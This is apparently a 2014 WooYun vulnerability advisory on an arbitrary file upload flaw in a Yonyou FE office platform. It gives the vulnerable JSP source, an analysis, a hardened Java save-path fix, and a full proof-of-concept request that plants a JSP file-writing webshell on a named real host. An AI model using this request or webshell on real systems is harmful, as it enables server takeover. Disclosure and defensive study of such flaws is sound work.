WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-08-10: Details sent to the vendor, awaiting vendor handling
2014-08-15: Vendor proactively ignored the vulnerability; details opened to third-party security partners
2014-10-09: Details disclosed to core white hats and relevant domain experts
2014-10-19: Details disclosed to regular white hats
2014-10-29: Details disclosed to intern white hats
2014-11-05: Details disclosed to the public
Previous report: WooYun: Arbitrary file upload leading to code execution in a Yonyou office platform (all versions). Search: intitle:"fe协作". The problem code is in \system\mediafile\fileupload.jsp:
<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*" errorPage="" %>
<%@ page import="java.io.*"%>
<%@ page import="java.util.*"%>
<%@ page import="fe.util.*"%>
<%@ page import="fe.upload.*"%>
<jsp:directive.page import="fe.sys.User"/>
<jsp:directive.page import="fe.res.ResourceManage"/>
<%
String path = request.getParameter("path");
String state=request.getParameter("state");
request.setCharacterEncoding("GBK");
if(state==null || "".equals(state)){
    UploadFile up=new UploadFile(request);
    up.setSavePath(path);
    String message=up.writeFile(true);
%>
<script language="javascript">
alert("<%=message%>");
var reloadSrc1=opener;
var href=reloadSrc1.location.href;
var index=href.indexOf("done");
if(index>0) href=href.substring(0,index);
reloadSrc1.location.href=href;
window.close();
</script>
<%
return;
}%>
<HTML><HEAD><TITLE>文件选择</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=GBK">
<style type="text/css">body, a, table, div, span, td, th, input, select{font:9pt;font-family: "宋体", Verdana, Arial, Helvetica, sans-serif;}body {padding:5px}</style>
<link href="/style1.css" rel="stylesheet" type="text/css">
<script language="JavaScript" src="/js35/XHConn.js"></script>
<script language="JavaScript">
//var filepath="";
var img=null;
function ok(){
    var fileName=document.all.file1.value;
    if(fileName.indexOf("\\")!=-1) fileName=fileName.substring(fileName.lastIndexOf("\\")+1);
    if(fileName==null || fileName==""){
        alert("请选择上传文件!");
        return;
    } else{
        if(fileName.toLowerCase().lastIndexOf(".doc")!=fileName.length-4){
            alert("系统只是支持上传DOC文件,请选择其他文件!");
            return;
        }
        var myConn = new XHConn();
        if(myConn){
            myConn.connect("checkfile.jsp", "POST", "type=file&fileName="+fileName+"&path=<%=path %>", checkName);
        }
    }
}
function checkName(oXML){
    var state=oXML.responseText;
    if(state.indexOf("#hasFile")!=-1){
        if(!window.confirm("文件已存在,是否覆盖?")){
            return;
        }
    }
    document.all.form1.submit();
    document.all.divProcessing.style.display="inline";
}
</script>
<BODY bgColor="#E0F0FE" style="margin:0px;">
<form name="form1" action="fileupload.jsp?path=<%=path %>" method="post" enctype="multipart/form-data">
<table width="317" height="81" border=0 align=center cellpadding=0 cellspacing=0>
<tr><td>上传文件不能大于10M(只能上传DOC文件)</td></tr>
<tr><td width="317" height="56">
<fieldset><legend>文件来源</legend>
<table border=0 cellpadding=0 cellspacing=0 width="100%">
<tr><td align="right"><input type="file" name="file1" id="file1" size="35"></td></tr>
</table>
</fieldset>
</td></tr>
<tr><td height=5> </td></tr>
<tr><td height=5> </td></tr>
<tr><td height="20" align=right>
<input class="singleInputButton" type="button" value=' 确定 ' id=Ok onclick="ok()">
<input class="singleInputButton" type=button value=' 取消 ' onclick="window.close();">
</td></tr>
</table>
</form>
<div id=divProcessing style="width:200px;height:30px;position:absolute;left:70px;top:30px;display:none">
<table border=0 cellpadding=0 cellspacing=1 bgcolor="#000000" width="100%" height="100%">
<tr><td bgcolor=#3A6EA5><marquee align="middle" behavior="alternate" scrollamount="5"><font color=#FFFFFF>...文件上传中...请等待...</font></marquee></td></tr>
</table>
</div>
</body></html>
Analysis:
String path = request.getParameter("path");   // save path, taken straight from the request
String state=request.getParameter("state");   // state flag
request.setCharacterEncoding("GBK");
if(state==null || "".equals(state)){
    UploadFile up=new UploadFile(request);    // wraps the raw request directly
    up.setSavePath(path);                     // writes the file to the caller-supplied path
The save directory is whatever the caller puts in the path parameter, and the ".doc" extension check exists only in the browser-side JavaScript, so nothing on the server restricts either the location or the type of the written file.
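The hardened save-path logic a defender would want in place of the code above, written here as an added Java example and not Yonyou's own code: the class name SafeUploadTarget and the upload root /var/fe-uploads are assumptions, and the sample inputs are constructed from the report's proof-of-concept request.

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;

// Hardened replacement for the save-path logic of fileupload.jsp (hypothetical helper,
// not FE product code): "path" may only pick a subfolder, the .doc check runs server-side,
// and the final target must stay inside a fixed upload root outside the deployed web app.
public final class SafeUploadTarget {
    // Fixed upload root; an assumption for this example (deliberately not fe.war).
    static final Path UPLOAD_ROOT = Paths.get("/var/fe-uploads").toAbsolutePath().normalize();

    // Returns where the upload may be written, or throws if the request is unsafe.
    public static Path resolve(String clientPath, String submittedName) {
        if (submittedName == null || submittedName.isEmpty()) throw new IllegalArgumentException("missing file name");
        // Drop client directory components; the original only did this in browser-side JS.
        String name = submittedName.replace('\\', '/');
        name = name.substring(name.lastIndexOf('/') + 1);
        // Server-side extension check: exactly one ".doc" suffix, so "test.jsp" and "a.doc.jsp" fail.
        if (!name.toLowerCase(Locale.ROOT).endsWith(".doc") || name.indexOf('.') != name.length() - 4) {
            throw new IllegalArgumentException("only .doc uploads are allowed: " + name);
        }
        // The original passed "path" straight to setSavePath(); reject absolute paths
        // (POSIX or Windows drive-letter form) and anything that normalizes outside the root.
        String rel = clientPath == null ? "" : clientPath.replace('\\', '/');
        if (rel.startsWith("/") || rel.matches("^[A-Za-z]:.*")) {
            throw new IllegalArgumentException("absolute save path rejected: " + clientPath);
        }
        Path target = UPLOAD_ROOT.resolve(rel).resolve(name).normalize();
        if (!target.startsWith(UPLOAD_ROOT)) {
            throw new IllegalArgumentException("save path escapes upload root: " + clientPath);
        }
        return target;
    }

    public static void main(String[] args) {
        // Constructed inputs: the report's proof-of-concept path with the .jsp name and with a
        // .doc name, a traversal attempt, and a legitimate upload into a subfolder.
        String[][] samples = {
            {"D:\\FE\\jboss\\server\\default\\.\\deploy\\fe.war\\", "test.jsp"},
            {"D:\\FE\\jboss\\server\\default\\.\\deploy\\fe.war\\", "test.doc"},
            {"../../deploy/fe.war", "shell.doc"},
            {"reports/2014", "notice.doc"},
        };
        for (String[] s : samples) {
            try {
                System.out.println("ALLOW " + resolve(s[0], s[1]));
            } catch (IllegalArgumentException e) {
                System.out.println("DENY  " + e.getMessage());
            }
        }
    }
}
```

Running main prints DENY for the first three samples (bad extension, absolute path, traversal) and ALLOW /var/fe-uploads/reports/2014/notice.doc for the last.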
Proof of exploitation:
POST /system/mediafile/fileupload.jsp?path=D:\FE\jboss\server\default\.\deploy\fe.war\ HTTP/1.1
Host: oa.peizheng.net.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://oa.peizheng.net.cn/system/mediafile/fileupload.jsp?path=1&state=2
Cookie: JSESSIONID=197566F74F854A9E06551298A76CCCE8
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------155811815622246
Content-Length: 2215

-----------------------------155811815622246
Content-Disposition: form-data; name="file1"; filename="test.jsp"
Content-Type: application/msword

<%@page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*,java.util.*,java.net.*"%>
<html>
<head>
<title>JspDo Code By Xiao.3</title>
<style type="text/css"> body { color:red; font-size:12px; background-color:white; } </style>
</head>
<body>
<%
if(request.getParameter("context")!=null) {
    String context=new String(request.getParameter("context").getBytes("ISO-8859-1"),"gb2312");
    String path=new String(request.getParameter("path").getBytes("ISO-8859-1"),"gb2312");
    OutputStream pt = null;
    try {
        pt = new FileOutputStream(path);
        pt.write(context.getBytes());
        out.println("<a href='"+request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+request.getRequestURI()+"'><font color='red' title='点击可以转到上传的文件页面!'>上传成功!</font></a>");
    } catch (FileNotFoundException ex2) {
        out.println("<font color='red'>上传失败!</font>");
    } catch (IOException ex) {
        out.println("<font color='red'>上传失败!</font>");
    } finally {
        try { pt.close(); } catch (IOException ex3) { out.println("<font color='red'>上传失败!</font>"); }
    }
}
%>
<form name="frmUpload" method="post" action="">
<font color="blue">本文件的路径:</font><%out.print(request.getRealPath(request.getServletPath())); %>
<br><br>
<font color="blue">上传文件路径:</font><input type="text" size="70" name="path" value="<%out.print(getServletContext().getRealPath("/")); %>">
<br><br>
上传文件内容:<textarea name="context" id="context" style="width: 51%; height: 150px;"></textarea>
<br><br>
<input type="submit" name="btnSubmit" value="Upload">
</form>
</body>
</html>
-----------------------------155811815622246--
The shell lands directly in the web root as test.jsp: http://oa.peizheng.net.cn/test.jsp
Severity: no impact (vendor ignored)
Ignored at: 2014-11-05 17:58
None yet